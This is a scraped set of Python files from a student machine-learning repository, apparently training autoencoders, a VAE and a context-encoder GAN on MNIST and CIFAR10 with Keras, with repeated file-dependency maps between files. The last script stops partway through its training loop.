| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,486 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/keras_conv_ae_use.py | import keras
from keras import backend as K
from keras.datasets import mnist
import numpy as np
import matplotlib.pyplot as plt
from mnist_conv_ae_models import *
from keras.callbacks import EarlyStopping
import seaborn as sns
sns.set(style="whitegrid", color_codes=True)
np.random.seed(1326) # for reproducibility
# Load dataset
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 28, 28, 1)) # adapt this if using `channels_first` image data format
x_test = np.reshape(x_test, (len(x_test), 28, 28, 1)) # adapt this if using `channels_first` image data format
y_train_onehot = keras.utils.to_categorical(y_train, 10)
y_test_onehot = keras.utils.to_categorical(y_test, 10)
# Test features learned by encoder
# Load encoder and decoder models
pretrained_e = encoder_model()
pretrained_e.load_weights('encoder.h5')
# Build classifier using encoder from autoencoder, encoder is not trainable
mnist_classifier_pretrained_e = classifier_e_frozen_model(pretrained_e)
# Print number of trainable and non-trainable parameters
trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e.trainable_weights)]))
non_trainable_count = int(
np.sum([K.count_params(p) for p in set(mnist_classifier_pretrained_e.non_trainable_weights)]))
print('Classifier w/ Unsupervised Encoder + FC Layers')
print('Total parameters: {:,}'.format(trainable_count + non_trainable_count))
print('Trainable paramseter: {:,}'.format(trainable_count))
print('Non-trainable parameters: {:,}'.format(non_trainable_count))
callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=5, verbose=0, mode='auto')]
# Hyperparameters for both models
batch_size=100
epochs=100
val_split = 1/5.
num=5000
# change size of training sets
x_train = x_train[0:num, :, :, :]
y_train_onehot = y_train_onehot[0:num]
# Train model
mnist_classifier_pretrained_e.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
mnist_classifier_pretrained_e.fit(x_train, y_train_onehot,
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=callbacks,
validation_split=val_split)
incorrects = np.nonzero(mnist_classifier_pretrained_e.predict_classes(x_test).reshape((-1,)) != y_test)
y_incorrects = y_test[incorrects]
# Plot frequency of incorrect labels
sns.countplot(x=y_incorrects, palette="Greens_d")
plt.ylabel('Number Predicted Incorrectly')
plt.xlabel('MNIST Digit')
plt.show()
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,487 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/linear_transform_test.py | from scipy.fftpack import dct, idct
from keras.layers import Conv2D, MaxPooling2D, UpSampling2D, Flatten, Activation, Reshape, Input
from keras.models import Sequential, Model
import keras.utils
from keras.datasets import mnist
from keras.callbacks import EarlyStopping, TensorBoard
import numpy as np
import matplotlib.pyplot as plt
import pywt
# Define models
def encoder_model():
z = Input(shape=(28,28,1))
#z = dct(dct(z.T, norm='ortho').T, norm='ortho')
x = Conv2D(16, kernel_size=(3, 3), padding='same')(z)
x = Activation('relu')(x)
x = MaxPooling2D(pool_size=(2, 2), padding='same')(x)
x = Conv2D(8, (3, 3), padding='same')(x)
x = Activation('relu')(x)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, (3, 3), padding='same')(x)
x = Activation('relu')(x)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Activation('relu')(x)
x = Flatten()(x)
return Model(z, x)
def decoder_model():
x = Input(shape=(128,))
z = Reshape((4,4,8))(x)
z = Conv2D(8, kernel_size=(3, 3), padding='same')(z)
z = Activation('relu')(z)
z = UpSampling2D((2,2))(z)
z = Conv2D(8, (3, 3), padding='same')(z)
z = Activation('relu')(z)
z = UpSampling2D((2, 2))(z)
z = Conv2D(16, (3, 3))(z)
z = Activation('relu')(z)
z = UpSampling2D((2, 2))(z)
z = Conv2D(1, (3, 3), padding='same')(z)
z = Activation('sigmoid')(z)
#z = idct(idct(z.T, norm='ortho').T, norm='ortho')
return Model(x, z)
def autoencoder_model(encoder, decoder):
model = Sequential()
model.add(encoder)
model.add(decoder)
return model
np.random.seed(1337) # for reproducibility
# Load dataset
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 28, 28, 1)) # adapt this if using `channels_first` image data format
x_test = np.reshape(x_test, (len(x_test), 28, 28, 1)) # adapt this if using `channels_first` image data format
dct_x_train = dct(x_train)
dct_x_test = dct(x_test)
dwt_x_train = pywt.dwt2(x_train, wavelet='coif1')
print(dct_x_train.shape)
plt.imshow(x_train[0].reshape(28, 28))
plt.show()
plt.imshow(dct_x_train[0].reshape(28, 28))
plt.show()
plt.imshow(dwt_x_train[0].reshape(28, 28))
plt.show()
y_train = keras.utils.to_categorical(y_train, 10)
y_test = keras.utils.to_categorical(y_test, 10)
# Create models for encoder, decoder and combined autoencoder
e = encoder_model()
d = decoder_model()
autoencoder = autoencoder_model(e, d)
# Specify loss function and optimizer for autoencoder
#autoencoder.compile(optimizer='adam', loss='mse', metrics=['accuracy'])
autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy', metrics=['accuracy'])
callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=5, verbose=0, mode='auto'),
TensorBoard(log_dir='/tmp/autoencoder', histogram_freq=5, write_graph=True,
write_images=True)]
history = autoencoder.fit(dct_x_train, x_train,
epochs=100,
batch_size=128,
shuffle=True,
validation_split = 1/12.,
callbacks=callbacks,
verbose=1
)
# Summarize history for accuracy
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('Training vs Validation Accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['Train', ' Validation'], loc='lower right')
plt.show()
# Summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Training vs Validation Loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Validation'], loc='upper right')
plt.show()
# Reconstruct images based on learned autencoder
recon_imgs = autoencoder.predict(x_test)
# Plot reconstructed images
n = 10
plt.figure(figsize=(20, 4))
for i in range(n):
# display original
ax = plt.subplot(2, n, i + 1)
plt.imshow(x_test[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# display reconstruction
ax = plt.subplot(2, n, i + 1 + n)
plt.imshow(recon_imgs[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,488 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_vae_train.py | from __future__ import print_function
import numpy as np
from functions.data_funcs import get_mnist
from functions.visualization_funcs import plot_train_loss, save_reconstructions
from functions.auxiliary_funcs import save_models
from mnist_mlp_models import vae_encoder_model, generator_model
from common_models.common_models import vae_model, vae_encoder_sampling_model
from keras import backend as K
from keras import metrics
from keras.models import Model
from keras.layers import Input, Lambda
from keras.callbacks import EarlyStopping, ModelCheckpoint
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100
num_classes = 10
image_path = 'Images/mnist_vae'
model_path = 'Models/mnist_vae'
epsilon_std = 0.05
# =====================================
# Load dataset
# =====================================
(X_train, y_train), (X_test, y_test) = get_mnist()
# =====================================
# Instantiate and compile models
# =====================================
# Instantiate models
encoder = vae_encoder_model()
generator = generator_model()
# Define sampling function
def sampling(args):
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(K.shape(z_mean)[0], latent_dim),
mean=0., stddev=epsilon_std)
return z_mean + K.exp(z_log_var / 2) * epsilon
# Define VAE model
x = Input(shape=img_shape)
z_mean, z_log_var = encoder(x)
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
recon_x = generator(z)
vae = Model(x, recon_x)
# Define VAE loss and compile model
xent_loss = np.prod(img_shape) * K.mean(metrics.binary_crossentropy(x, recon_x))
kl_loss = - 0.5 * K.sum(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)
vae_loss = K.mean(xent_loss + kl_loss)
vae.add_loss(vae_loss)
vae.compile(optimizer='rmsprop', loss=None)
# =====================================
# Train models
# =====================================
# Specify training hyper-parameters
epochs = 50
batch_size = 128
patience = 10
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(filepath=model_path+'.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model
history = vae.fit(X_train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
callbacks=callbacks,
validation_split=1/12.)
# Replace current encoder and decoder models with that from the best save autoencoder
stochastic_encoder = vae_encoder_model()
encoder = vae_encoder_sampling_model(stochastic_encoder, latent_dim, img_shape, epsilon_std)
generator = generator_model()
vae = vae_model(encoder, generator, img_shape)
vae.load_weights(model_path + '.h5')
# Save encoder and decoder models
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, encoder, img_rows, img_cols, channels, color=False)
# Plot training curves
plot_train_loss(image_path, history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,489 | davidhayes3/ME-Project | refs/heads/master | /train_models/cifar10_cnn/cifar10_ce_train.py | from __future__ import print_function, division
from functions.data_funcs import get_mnist
from keras.layers import Input, Dense, Flatten, Dropout
from keras.layers import BatchNormalization, Activation
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from keras.models import Sequential, Model
from keras.optimizers import Adam
import matplotlib.pyplot as plt
import numpy as np
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 32
img_cols = 32
mask_height = 8
mask_width = 8
channels = 3
img_shape = (img_rows, img_cols, channels)
missing_shape = (mask_height, mask_width, channels)
num_classes = 10
image_path = 'Images/cifar10_ce'
model_path = 'Models/cifar10_ce'
def sample_images(path, epoch, imgs):
r, c = 3, 6
masked_imgs, missing_parts, (y1, y2, x1, x2) = mask_randomly(imgs)
gen_missing = generator.predict(masked_imgs)
imgs = 0.5 * imgs + 0.5
masked_imgs = 0.5 * masked_imgs + 0.5
gen_missing = 0.5 * gen_missing + 0.5
fig, axs = plt.subplots(r, c)
for i in range(c):
axs[0, i].imshow(imgs[i, :, :])
axs[0, i].axis('off')
axs[1, i].imshow(masked_imgs[i, :, :])
axs[1, i].axis('off')
filled_in = imgs[i].copy()
filled_in[y1[i]:y2[i], x1[i]:x2[i], :] = gen_missing[i]
axs[2, i].imshow(filled_in)
axs[2, i].axis('off')
fig.savefig(path + '_%d.png' % epoch)
plt.close()
def generator_model():
model = Sequential()
# Encoder
model.add(Conv2D(32, kernel_size=3, strides=2, input_shape=img_shape, padding="same"))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Conv2D(64, kernel_size=3, strides=2, padding="same"))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Conv2D(128, kernel_size=3, strides=2, padding="same"))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Conv2D(512, kernel_size=1, strides=2, padding="same"))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.5))
# Decoder
model.add(UpSampling2D())
model.add(Conv2D(128, kernel_size=3, padding="same"))
model.add(Activation('relu'))
model.add(BatchNormalization(momentum=0.8))
model.add(UpSampling2D())
model.add(Conv2D(64, kernel_size=3, padding="same"))
model.add(Activation('relu'))
model.add(BatchNormalization(momentum=0.8))
model.add(Conv2D(channels, kernel_size=3, padding="same"))
model.add(Activation('tanh'))
masked_img = Input(shape=img_shape)
gen_missing = model(masked_img)
return Model(masked_img, gen_missing)
def discriminator_model():
model = Sequential()
model.add(Conv2D(64, kernel_size=3, strides=2, input_shape=missing_shape, padding="same"))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Conv2D(128, kernel_size=3, strides=2, padding="same"))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Conv2D(256, kernel_size=3, padding="same"))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Flatten())
model.add(Dense(1, activation='sigmoid'))
model.summary()
img = Input(shape=missing_shape)
validity = model(img)
return Model(img, validity)
return model
def mask_randomly(imgs):
y1 = np.random.randint(0, img_rows - mask_height, imgs.shape[0])
y2 = y1 + mask_height
x1 = np.random.randint(0, img_rows - mask_width, imgs.shape[0])
x2 = x1 + mask_width
masked_imgs = np.empty_like(imgs)
missing_parts = np.empty((imgs.shape[0], mask_height, mask_width, channels))
for i, img in enumerate(imgs):
masked_img = img.copy()
_y1, _y2, _x1, _x2 = y1[i], y2[i], x1[i], x2[i]
missing_parts[i] = masked_img[_y1:_y2, _x1:_x2, :].copy()
masked_img[_y1:_y2, _x1:_x2, :] = 0
masked_imgs[i] = masked_img
return masked_imgs, missing_parts, (y1, y2, x1, x2)
# =====================================
# Instantiate & compile models
# =====================================
# Instantiate models
generator = generator_model()
discriminator = discriminator_model()
# Specify optimizer for models
lr = 0.0002
beta_1 = 0.5
optimizer = Adam(lr=0.0002, beta_1=beta_1)
# Compile models
generator.compile(loss=['binary_crossentropy'], optimizer=optimizer)
discriminator.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])
# Define context encoder model
masked_img = Input(shape=img_shape)
gen_mask = generator(masked_img)
validity = discriminator(gen_mask)
# The combined model (stacked generator and discriminator) takes
# masked_img as input => generates missing image => determines validity
context_encoder = Model(masked_img, [gen_mask, validity])
discriminator.trainable = False
context_encoder.compile(loss=['mse', 'binary_crossentropy'],optimizer=optimizer)
# =====================================
# Load dataset
# =====================================
# Load CIFAR10 dataset
(X_train, y_train), (X_test, y_test) = get_mnist(gan=True)
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 100
batch_size = 128
epoch_save_interval = 5
num_batches = int(X_train.shape[0] / batch_size)
# Define arrays to hold progression of discriminator and bigan losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
d_acc_trajectory = np.zeros(epochs)
# Train for set number of epochs
for epoch in range(epochs):
# Print current epoch number
print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))
# Set epoch losses to zero
d_epoch_loss_sum = 0
g_epoch_loss_sum = 0
d_acc = 0
# Shuffle training set
perm = np.random.randint(0, X_train.shape[0], X_train.shape[0])
X_train = X_train[perm]
# Train on all batches
for batch in range(num_batches):
# Labels for supervised training
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
# ---------------------
# Train Discriminator
# ---------------------
# Select next batch of images from training set and encode
imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
masked_imgs, missing_piece, _ = mask_randomly(imgs)
# Generate a half batch of new images
gen_missing_piece = generator.predict(masked_imgs)
# Train the discriminator
d_loss_real = discriminator.train_on_batch(missing_piece, valid)
d_loss_fake = discriminator.train_on_batch(gen_missing_piece, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# Record discriminator batch loss details
d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
d_epoch_loss_sum += d_loss[0]
d_acc += d_loss[1]
# ---------------------
# Train Generator
# ---------------------
# Train the generator
g_loss = context_encoder.train_on_batch(masked_imgs, [missing_piece, valid])
# Print progress
print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch+1, batch, num_batches,
d_loss[0], 100 * d_loss[1], g_loss[0]))
# Record epoch loss data
d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
d_acc_trajectory[epoch] = 100 * (d_acc / num_batches)
# If at save interval, save generated image samples
if epoch % epoch_save_interval == 0:
# Select a random half batch of images
idx = np.random.randint(0, X_train.shape[0], 6)
imgs = X_train[idx]
